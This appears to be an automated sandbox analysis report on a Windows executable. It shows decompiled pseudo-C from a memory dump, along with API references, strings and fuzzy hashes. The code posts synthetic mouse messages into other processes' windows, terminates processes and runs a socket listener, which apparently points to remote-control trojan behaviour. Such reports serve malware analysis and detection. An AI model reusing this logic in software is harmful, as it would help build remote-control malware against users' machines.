								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E0040536A(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E0040C1C2( *((intOrPtr*)(_t207 + 0x44)));
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E0040C1C2(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E004159FB( &_v76);
							LeaveCriticalSection(0x4223c0);
							_t111 =  *0x4223bc(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E00404C54(_v84);
						E004159FB( &_v76);
						goto L8;
					}
				}
			}

0x00405b18
0x00405b25
0x00405b9d
0x00405ba6
0x00000000
0x00405b33
0x00405b39
0x00405b3f
0x00405b47
0x00405b49
0x00405b50
0x00405b96
0x00405b97
0x00000000
0x00405b97
0x00405b55
0x00405b5f
0x00405d3b
0x00405d3b
0x00405d47
0x00405d49
0x00405d51
0x00405d55
0x00405d5e
0x00405d62
0x00405d65
0x00405d68
0x00405d6e
0x00405d73
0x00405d76
0x00405d8d
0x00405d94
0x00405d9a
0x00405d9c
0x00405dbb
0x00405dbe
0x00405dbe
0x00405dbe
0x00405dc1
0x00405d9e
0x00405da1
0x00405da6
0x00405db4
0x00405db4
0x00405d78
0x00405d78
0x00405d83
0x00405d8a
0x00405dca
0x00405dca
0x00405dd0
0x00405dd0
0x00405baf
0x00405bb5
0x00405bb5
0x00405b69
0x00405dec
0x00405df3
0x00405df8
0x00405dff
0x00405e08
0x00405e0c
0x00405e0f
0x00405e12
0x00405e18
0x00405e1d
0x00405e20
0x00405e3c
0x00405e42
0x00405e45
0x00405e49
0x00405e54
0x00405e4b
0x00405e4f
0x00405e4f
0x00405e22
0x00405e22
0x00405e2d
0x00405e34
0x00405e5a
0x00405e5a
0x00000000
0x00405e0f
0x00405b7a
0x00405b7f
0x00405b86
0x00405bb8
0x00405bbc
0x00405dd9
0x00405ddd
0x00405de6
0x00405de6
0x00405de9
0x00000000
0x00405de9
0x00405bc7
0x00405bcc
0x00405bd0
0x00405bd2
0x00405bf8
0x00405bfc
0x00405c00
0x00405c02
0x00405c13
0x00405c15
0x00405c19
0x00405c1b
0x00405c32
0x00405c3a
0x00405c42
0x00405c4f
0x00405c54
0x00405c58
0x00405c58
0x00405c58
0x00405c61
0x00405c70
0x00405c78
0x00405c98
0x00405c1d
0x00405c25
0x00405c25
0x00405c1b
0x00405c9c
0x00405ca1
0x00405d08
0x00405d08
0x00405d0d
0x00000000
0x00000000
0x00405d17
0x00405d20
0x00405d20
0x00405d20
0x00405d24
0x00405d2b
0x00405d32
0x00405d38
0x00000000
0x00405d38
0x00405ca3
0x00405ca7
0x00405ca9
0x00405cb3
0x00405cab
0x00405cab
0x00405cae
0x00405cae
0x00405cb7
0x00405cd6
0x00405cda
0x00405cdf
0x00405ce4
0x00405cfd
0x00405d00
0x00405d03
0x00405d03
0x00405ce6
0x00405ce6
0x00405ce9
0x00000000
0x00000000
0x00405cf3
0x00405cf7
0x00405cf7
0x00000000
0x00405bd4
0x00405bd8
0x00405bde
0x00405bf3
0x00000000
0x00405bf3
0x00405b88
0x00405b8c
0x00405b91
0x00000000
0x00405b91
0x00405b86

APIs

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

EnterCriticalSection.KERNEL32(004223C0), ref: 00405B39
LeaveCriticalSection.KERNEL32(004223C0), ref: 00405B97
LeaveCriticalSection.KERNEL32(004223C0,?), ref: 00405BDE
LeaveCriticalSection.KERNEL32(004223C0), ref: 00405D49
EnterCriticalSection.KERNEL32(004223C0), ref: 00405D68
LeaveCriticalSection.KERNEL32(004223C0), ref: 00405DCA
LeaveCriticalSection.KERNEL32(004223C0), ref: 00405DF3
EnterCriticalSection.KERNEL32(004223C0), ref: 00405E12
LeaveCriticalSection.KERNEL32(004223C0), ref: 00405E5A

Strings

Accept-Encoding, xrefs: 00405C68
identity, xrefs: 00405C5C
If-Modified-Since, xrefs: 00405C8C

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: d421e9e5b9ae2cbdbeffcd1dc7ffbdc98c06ca74ae96c3c671553232fb8eaac0
Instruction ID: 3882ad29639a359a583761435ecd95431e04d6d99277252feea9ba1bb6d6417a
Opcode Fuzzy Hash: d421e9e5b9ae2cbdbeffcd1dc7ffbdc98c06ca74ae96c3c671553232fb8eaac0
Instruction Fuzzy Hash: A9A15A71504B01EFCB10EF24D945A5ABBA0FF88314F104A2BF895B32A1D738E955CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004169DB, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004169DB(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t15 =  *(__eax + 0x1c);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t20 = E0040DBD1( &(_t41[0x5f]));
				}
				return _t20;
			}

0x004169e3
0x004169e5
0x004169eb
0x004169ee
0x004169ee
0x004169f0
0x004169fb
0x004169fe
0x004169fe
0x00416a00
0x00416a06
0x00416a09
0x00416a09
0x00416a0f
0x00416a14
0x00416a17
0x00416a17
0x00416a19
0x00416a1e
0x00416a21
0x00416a21
0x00416a27
0x00416a2b
0x00416a2e
0x00416a2e
0x00416a35
0x00416a37
0x00416a3f
0x00416a48
0x00416a48
0x00416a4e
0x00416a56
0x00416a59
0x00416a59
0x00416a5b
0x00416a63
0x00416a66
0x00416a66
0x00416a6c
0x00416a74
0x00416a77
0x00416a77
0x00416a79
0x00416a81
0x00416a9f
0x00416a9f
0x00416aab
0x00416aab
0x00416ab3

APIs

DeleteObject.GDI32(?), ref: 004169EE
CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004169FE
TlsFree.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A09
CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A17
UnmapViewOfFile.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A21
CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A2E
SelectObject.GDI32(?,?), ref: 00416A48
DeleteObject.GDI32(?), ref: 00416A59
DeleteDC.GDI32(?), ref: 00416A66
CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A77
WaitForSingleObject.KERNEL32(?,00000000,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A86
PostThreadMessageW.USER32 ref: 00416A9F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: ce97eb7983be76599ff4fda6c143c4391d3c1384506c9938670db8f77645638d
Instruction ID: b5d85ba94d02b877369fefcdc6f288271fc40a766d642b9ebb4dde442bb7d132
Opcode Fuzzy Hash: ce97eb7983be76599ff4fda6c143c4391d3c1384506c9938670db8f77645638d
Instruction Fuzzy Hash: 9921EE707007015BD620DB79DD48F97B7ECAF45781F05892AB596F76A0DB38E880CA28

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC77, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC77(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E00416709(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t86 =  &_v140;
					E0041081B( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
					_v5 = E0040F9A5( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E0040AB15(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E0040C1FE( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						TerminateProcess( *(_t85 + 0x17c), 0);
						E0040DBD1(_t85 + 0x17c);
						goto L14;
					}
					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

0x0040ac77
0x0040ac77
0x0040ac85
0x0040ac8c
0x0040ac8f
0x0040ac94
0x0040ade0
0x00000000
0x0040ade0
0x0040aca9
0x0040acd7
0x0040acab
0x0040acbb
0x0040acc1
0x0040acd2
0x0040acd2
0x0040ace5
0x0040ad30
0x0040ad37
0x0040ad9f
0x0040ad9f
0x0040ada9
0x0040adb4
0x0040adc6
0x0040adda
0x0040adda
0x00000000
0x0040ada9
0x0040ad45
0x0040ad4d
0x0040ad65
0x00000000
0x00000000
0x0040ad77
0x0040ad94
0x0040ad9a
0x00000000
0x0040ad9a
0x0040ad83
0x00000000
0x00000000
0x00000000
0x0040aced
0x0040acf0
0x0040acff
0x0040ad1b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ad1b

APIs

Part of subcall function 00416709: GetClassNameW.USER32 ref: 00416724

GetWindowThreadProcessId.USER32(?,?), ref: 0040ACA1
ResetEvent.KERNEL32(00000010), ref: 0040ACF0
PostMessageW.USER32(?,?,?,00000010), ref: 0040AD13
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 0040AD22
ResetEvent.KERNEL32(?,?,?,00000010), ref: 0040AD4D
PostThreadMessageW.USER32 ref: 0040AD5D
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0040AD6F

Part of subcall function 0041081B: StringFromGUID2.OLE32(00000000,?,00000028,00413175,?,00000010,00000000,0001FE38), ref: 004108BC

Part of subcall function 0040F9A5: OpenMutexW.KERNEL32(00100000,00000000,00000000,00413AF6,?,19367401,?,00000001,8889347B,00000002), ref: 0040F9B0
Part of subcall function 0040F9A5: CloseHandle.KERNEL32(00000000), ref: 0040F9BB

TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 0040AD94

Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE0
Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE9

IntersectRect.USER32 ref: 0040ADB4
FillRect.USER32 ref: 0040ADC6
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0040ADDA

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 2453266691-0
Opcode ID: 07324097c05f7ba797bfd3244aef855fe692dcf8b08262a511cb84801104517f
Instruction ID: fcef4d2a36faa959bd1232e80ec6845b18cacb22e6038fd2474d62372e685308
Opcode Fuzzy Hash: 07324097c05f7ba797bfd3244aef855fe692dcf8b08262a511cb84801104517f
Instruction Fuzzy Hash: 6341C131500208BBEF10AFA1CC45BEA7B79AF04305F0480B6F944FA1E2D779D964DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00408286, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00408286(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E00416AB6(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E00407DF8(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E00407D89(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E00416AB6(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E004108F7(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E00407D89(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E00416709(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E00407D89(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E00416709(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E00407FF8(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E00407FF8(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E00416AB6(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E00407FF8(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E00407FF8(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E00416AB6(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E00416AB6(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x0040828e
0x00408290
0x00408296
0x004082a0
0x004082cc
0x004082d2
0x004082d7
0x004082eb
0x004082d9
0x004082d9
0x004082d9
0x004082a2
0x004082a6
0x004082b0
0x004082b5
0x004082b5
0x004082bd
0x004082c5
0x004082c5
0x004082bd
0x004082f4
0x004082f7
0x004082fd
0x00408303
0x0040830b
0x0040858f
0x00408593
0x00408593
0x00408311
0x00408314
0x00408314
0x00408318
0x00408321
0x00000000
0x00408323
0x00408323
0x00000000
0x00408323
0x0040831a
0x0040831a
0x00408324
0x00408328
0x0040832d
0x0040832d
0x00408330
0x00408330
0x00408334
0x0040833d
0x00408349
0x00408349
0x0040834c
0x0040834c
0x00408350
0x00408359
0x00408365
0x00408365
0x00408368
0x00408371
0x00408379
0x0040837f
0x00408384
0x00408387
0x0040838d
0x00408392
0x0040839d
0x004083b4
0x004083bc
0x004083be
0x004083c1
0x004083c1
0x004083bc
0x0040839d
0x004083c5
0x004083f4
0x004083f4
0x004083f9
0x004083fc
0x00408404
0x00408429
0x00408433
0x00408433
0x00408414
0x00408414
0x00408417
0x0040841e
0x0040841e
0x00408404
0x00000000
0x004083c7
0x004083c8
0x004083cf
0x00000000
0x00000000
0x004083d4
0x004083e6
0x004083e6
0x004083eb
0x00408438
0x0040843a
0x00000000
0x00000000
0x00408445
0x0040844c
0x00408454
0x00000000
0x00000000
0x0040845e
0x00408465
0x0040846b
0x00408494
0x0040846d
0x0040846e
0x00408475
0x0040848d
0x00408490
0x00408477
0x00408477
0x00408477
0x00408475
0x0040849b
0x004084af
0x00000000
0x00000000
0x004084b1
0x004084b2
0x004084b3
0x004084b8
0x00000000
0x0040849d
0x0040849d
0x0040849e
0x0040849f
0x004084a4
0x004084bd
0x004084bd
0x004084c3
0x004084c4
0x004084c9
0x004084ce
0x004084d2
0x004084e6
0x00408505
0x00408509
0x0040851d
0x0040853c
0x00408540
0x0040855a
0x0040855a
0x00408566
0x00408589
0x00408589
0x00000000
0x00408566
0x0040851f
0x00408520
0x00408521
0x00408526
0x0040852b
0x0040852b
0x00408531
0x00408532
0x00408537
0x00000000
0x00408537
0x0040850b
0x0040850c
0x0040850d
0x00408512
0x00000000
0x00408512
0x004084e8
0x004084e9
0x004084ea
0x004084ef
0x004084f4
0x004084f4
0x004084fa
0x004084fb
0x00408500
0x00000000
0x00408500
0x004084d4
0x004084d5
0x004084d6
0x004084db
0x00000000
0x004084db
0x0040849b
0x004083c5
0x0040835b
0x0040835c
0x00408360
0x00000000
0x00408360
0x00408352
0x00000000
0x00408352
0x0040833f
0x00408340
0x00408344
0x00000000
0x00408344
0x00408336
0x00000000
0x00408336

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 00408392
GetParent.USER32(00000000), ref: 004083B4
GetWindowThreadProcessId.USER32(?,00000000), ref: 004083D9
IsWindow.USER32(?), ref: 004083FC

Part of subcall function 00407DF8: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407E0C
Part of subcall function 00407DF8: ReleaseMutex.KERNEL32(?), ref: 00407E2B
Part of subcall function 00407DF8: GetWindowRect.USER32 ref: 00407E38
Part of subcall function 00407DF8: IsRectEmpty.USER32(?), ref: 00407EBC
Part of subcall function 00407DF8: GetWindowLongW.USER32(?,000000F0), ref: 00407ECB
Part of subcall function 00407DF8: GetParent.USER32(?), ref: 00407EE1
Part of subcall function 00407DF8: MapWindowPoints.USER32 ref: 00407EEA
Part of subcall function 00407DF8: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00407F0E

GetWindowInfo.USER32 ref: 0040844C
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 00408589

Part of subcall function 00407D89: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004081C2,00000000), ref: 00407D8F
Part of subcall function 00407D89: ReleaseMutex.KERNEL32(?), ref: 00407DC3
Part of subcall function 00407D89: IsWindow.USER32(?), ref: 00407DCA
Part of subcall function 00407D89: PostMessageW.USER32(?,00000215,00000000,?), ref: 00407DE4

Strings

@, xrefs: 004084E2
<, xrefs: 00408445
, xrefs: 00408330

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: a57c4a085712b8c8ee2f847a92f76f5259cb9b2a2aaf874e7b7dc42c94ed0d72
Instruction ID: fc83bac8557be689e20df3a379345d8f223ac9f3bfa77508c446ea9ee7c26309
Opcode Fuzzy Hash: a57c4a085712b8c8ee2f847a92f76f5259cb9b2a2aaf874e7b7dc42c94ed0d72
Instruction Fuzzy Hash: E491B270600309ABDB119E54CA85FFF7BB4AF80B48F14402EF990762D1DBBD9981D759

Uniqueness

Uniqueness Score: -1.00%

Function 00414114, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00414114(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				long _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				long _t48;
				void* _t49;
				long _t56;
				long _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				long _t69;
				void* _t72;
				long _t77;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E0041317B(__ecx, __eflags, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					_t48 = E004132A1();
					__eflags = _t48;
					if(_t48 == 0) {
						L26:
						E0040F995(_v148);
						_t49 = 0;
						__eflags = 0;
						L27:
						return _t49;
					}
					E00413DB2(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E00413FBF( &_v160, _v78,  &_v168) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 != 0) {
						L7:
						__eflags = _t94 - _v74;
						if(_t94 != _v74) {
							E00413E6D( &_v124);
							_v78 = _t94;
							E00413EC5( &_v128);
						}
						_v144 =  *0x423d64;
						_t56 = _v152;
						_v172 = 1;
						__eflags = _t56;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						__eflags = _t57;
						if(_t57 != 0) {
							_t87 = _v172;
							_t20 =  &_v172;
							 *_t20 = _v172 + 1;
							__eflags =  *_t20;
							 *(_t100 + 0x2c + _v172 * 4) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						__eflags = _t59;
						if(_t59 <= 0) {
							L25:
							E0040F565(_t59, _v156);
							E0040F565(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(1) {
								__eflags = _t59 - _v172;
								if(_t59 >= _v172) {
									goto L25;
								}
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								__eflags = _t64 - _v152;
								if(_t64 != _v152) {
									__eflags = _t64 - _v160;
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t39 =  &_v168; // 0x414047
											_t65 =  *_t85( *_t39, 0, 0);
											_t97 = _t65;
											__eflags = _t97 - 0xffffffff;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E0040F5BD(_t87, _t97);
											_t69 = E0040DBF7(0x20000, E00414047, _t97);
											__eflags = _t69;
											if(_t69 == 0) {
												E0040F565(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										__eflags = _t59;
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t77 = WaitForSingleObject( *0x423d64, 0x3e8);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							break;
						}
						_t87 = _v74;
						_t94 = E00413FBF( &_v156, _v74,  &_v164) & 0x0000ffff;
						__eflags = _t94;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					__eflags = _t94;
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x0041411a
0x00414125
0x0041412c
0x00414133
0x00414139
0x00414143
0x00414148
